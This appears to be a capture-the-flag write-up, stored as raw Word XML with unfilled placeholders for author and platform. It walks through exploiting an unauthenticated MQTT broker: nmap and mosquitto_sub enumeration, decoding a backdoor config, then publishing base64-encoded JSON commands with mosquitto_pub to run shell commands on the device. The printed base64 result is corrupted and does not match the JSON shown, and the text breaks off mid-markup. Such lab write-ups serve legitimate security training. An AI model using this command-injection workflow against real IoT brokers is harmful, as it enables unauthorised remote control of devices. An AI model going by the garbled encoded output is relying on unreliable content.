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20857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# IoT MQTT Backdoor Exploitation Write-Up  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B6CB00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**Author:** [Your Name/Handle]  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9666DD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**Platform:** [Platform Name, e.g., TryHackMe, HackTheBox]  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF4F809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**Date:** [Current Date]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DC639C" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E638B4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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591A33D8" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D43D93B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# Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF19EA1" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665F3312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This assessment targeted a vulnerable IoT environment using an unsecured MQTT broker. Through reconnaissance and traffic analysis, I discovered a backdoor command channel embedded in MQTT communications. By decoding the command structure, crafting base64-encoded JSON payloads, and publishing them to specific topics, I achieved remote command execution and captured the target flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D37164C" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="755F5CDD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The exploitation demonstrates how **insecure MQTT implementations** can lead to complete system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667A82D8" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FA7C5A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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1881410B" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A90D40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# PHASE 1: RECONNAISSANCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E2A50" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465A25A4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### Initial Port Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B62D19C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An Nmap scan was performed to identify open services on the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690FF6A8" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24767296" w14:textId="0FB7A402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![Nmap Discovery]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="131BA657" wp14:editId="2EBD9895">
            <wp:extent cx="5731510" cy="1673860"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="154466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67705" name="Picture 15446677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9904" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50F914F4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lastRenderedPageBreak/>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA5C10F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nmap -sV -p- 10.81.170.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EC5649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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B6EF7D" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="050E2E09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**Findings:**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C08B56A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- **SSH (22/tcp)** – OpenSSH 8.2p1 Ubuntu  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45244D93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- **MQTT (1883/tcp)** – Mosquitto broker (unauthenticated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC0E577" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F2FC2D9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The MQTT service was identified as the primary attack surface for IoT communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5652D6A6" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="430173A6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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BE7CE0" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BC9617D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# PHASE 2: TOOL SETUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ADB028" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4BCDC3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Installed necessary MQTT client utilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1021ACE0" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76F1CABD" w14:textId="2F8AB393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![Tool Installation]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6838B47C" wp14:editId="3DF3081A">
            <wp:extent cx="5731510" cy="1976755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="724383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83705" name="Picture 7243837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ABCC" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35FA83C2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```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669D6A5D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sudo apt install mosquitto mosquitto-clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4006572A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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4AB6E1" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2356C0AA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**Tools Used:**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5229F4F3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- `mosquitto_sub` – Subscribe to MQTT topics  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA6FB26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lastRenderedPageBreak/>
        <w:t>- `mosquitto_pub` – Publish crafted messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FDB7B8" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7E02A8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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2338C7B1" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="545190EA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# PHASE 3: ENUMERATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58314303" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E4BA68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### Subscribing to All MQTT Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D00C57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Subscribed to all topics using a wildcard to capture device communications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19761018" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61541BD1" w14:textId="59BC7C09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![Initial MQTT Traffic]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E8218AE" wp14:editId="0C88088B">
            <wp:extent cx="5731510" cy="1535430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="11763634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63440" name="Picture 11763634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C1C7B" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359D88AE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```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7791478F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mosquitto_sub -h $BROKER_IP -r "#" -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B733CAD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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEB78EA" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A8A681A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**Observed Traffic:**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC85EAC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- Regular device telemetry (thermostats, lights, cameras)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E4D34A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- Base64-encoded messages in specific topics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8A7973" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67621A20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### Decoding the Backdoor Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39912673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A base64 payload from a config topic revealed the backdoor structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107CE80A" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22DE8E71" w14:textId="578F641C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![Backdoor Discovery Decoded](</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33005A64" wp14:editId="2A4B71CD">
            <wp:extent cx="5731510" cy="308610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8646836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83618" name="Picture 8646836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517A" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004199A7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lastRenderedPageBreak/>
        <w:t>```json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB05775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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1821C2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"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D3FA40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"registered_commands": ["HELP", "CMD", "SYS"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A343CDF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"pub_topic": "U4vyqNLQtf/OvozmaZyLT/15H9TF6CHg/pub",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311005C3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"sub_topic": "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB9E002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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD38238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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3781DA" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="487D4410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### Testing the HELP Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A8F8AD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First test with the HELP command to understand functionality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5558B6AD" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4764DCAB" w14:textId="2AF4312C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![Help Command Testing]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A4B167D" wp14:editId="185C60A4">
            <wp:extent cx="5731510" cy="1151890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5189054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05489" name="Picture 5189054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7374" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58C3C8C2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### Key Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F9AD57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* Device accepts **3 remote commands**: HELP, CMD, SYS  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7BCDE8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* Commands must be sent to **pub_topic**  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A96F4F3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* Responses arrive via **sub_topic**  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C400CE8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* All messages must be **base64-encoded JSON**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003BF913" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17CF0ABF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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDC07BE" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202201BD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# PHASE 4: INITIAL TESTING &amp; ERRORS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A96323" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="244D0764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### First Attempt – Plain JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A213A5B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Attempting to send raw JSON resulted in an error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C88349" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52615345" w14:textId="013D3A40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lastRenderedPageBreak/>
        <w:t>![Error: Base64 Requirement]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24F065F2" wp14:editId="20A76CE0">
            <wp:extent cx="5731510" cy="309245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7670435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43547" name="Picture 7670435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47067" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1926A9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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ED1C5B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Invalid message format. Format: base64(...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B65854F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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B7EEA7" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4B7D65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### Understanding the Required Format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1667ED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The device required commands in this JSON structure, then base64-encoded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489DDFF1" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA4E94E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```json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30973D7D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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351EAA78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"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747E9110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"cmd": "CMD",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368FF9FD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"arg": "&lt;command&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C763D65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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1E2767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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DA80D8" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="438DC3FF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### Initial JSON Command Attempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A4EC46" w14:textId="38DB05F1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![JSON Command Attempt]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EFF1998" wp14:editId="7550D3D2">
            <wp:extent cx="5731510" cy="233045"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14228417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41721" name="Picture 14228417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FCB7" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD3D6AA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### Testing Base64 Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DF1DF5" w14:textId="65FE7624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![Base64 Encoding Attempt]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E07344B" wp14:editId="5C38C676">
            <wp:extent cx="5731510" cy="240665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="4763154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15494" name="Picture 4763154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36EA" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68809309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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2795ACFE" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="341A5541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# PHASE 5: EXPLOITATION WORKFLOW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7145754D" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B2113F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## 1. Crafting the JSON Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4C648C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lastRenderedPageBreak/>
        <w:t>Example for executing `ls`:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBA0D59" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9EFBE8" w14:textId="4AFECD73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![CyberChef LS Command]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C1C8999" wp14:editId="57ADF1F7">
            <wp:extent cx="5731510" cy="2818765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="11005883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88364" name="Picture 11005883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AE67" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="005964F6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```json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0082E60C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{"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d", "cmd": "CMD", "arg": "ls"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C00213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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391C5F18" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1078DFC2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## 2. Base64 Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082CC642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Using CyberChef or command line to encode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BE8EF8" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="017F9464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```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166C8112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echo '{"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d", "cmd": "CMD", "arg": "ls"}' | base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA0409E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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDBD1C4" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="650B1E9F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Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A2B278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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA59755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eyJpZC16ICJjZGQxYjFjMCoxYZQwLTRiMGYtOGUyMi82MMIzMTc1MDhiM2QiLCAIY21kIjogIKMNRCIsICJhcmc 101AibHMi fQgK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAB8DE5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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596F40E3" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C19353C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lastRenderedPageBreak/>
        <w:t>## 3. Publishing to the Backdoor Topic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1C0070" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15D9A12C" w14:textId="3DBB6640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![Executing LS Command]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AF3A16A" wp14:editId="3FA87C75">
            <wp:extent cx="5731510" cy="250190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7503351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35192" name="Picture 75033519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DD4A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```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441E4496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mosquitto_pub -h $BROKER_IP -t "U4vyqNLQtf/OvozmaZyLT/15H9TF6CHg/pub" -m "&lt;base64-payload&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583A0D20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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46166E46" w14:textId="77777777" w:rsidR="00EA3F49" w:rsidRPr="00EA3F49" w:rsidRDefault="00EA3F49" w:rsidP="00EA3F49">
      <w:pPr>
